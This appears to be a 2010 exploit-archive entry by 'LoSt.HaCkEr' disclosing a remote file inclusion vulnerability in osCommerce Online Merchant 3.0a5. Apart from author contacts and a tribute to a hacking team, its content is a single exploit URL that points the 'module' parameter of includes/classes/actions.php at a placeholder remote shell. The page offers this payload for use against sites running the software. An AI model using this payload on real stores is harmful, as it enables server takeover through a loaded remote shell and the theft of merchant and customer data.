osCommerce Online Merchant Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : osCommerce Online Merchant Remote File Inclusion Vulnerability
# Published : 2010-08-26
# Author : LoSt.HaCkEr
# Previous Title : Atomic Photo Album 1.0.2 Multiple Vulnerabilities
# Next Title : CF Image Hosting Script 1.3 (settings.cdb) Information Disclosure Vulnerability

# Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ] 
# Date: [26-8-2010] 
# Author: LoSt.HaCkEr? /? aDaM_TRoJaN
# Software Link: [http://www.oscommerce.com/solutions/downloads] 
# Version: [v 3.0 ] 
# Tested on: [Windows XP] 
# CVE :
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/? aDaM_TRoJaN@yahoo.com
?+++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
?+++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers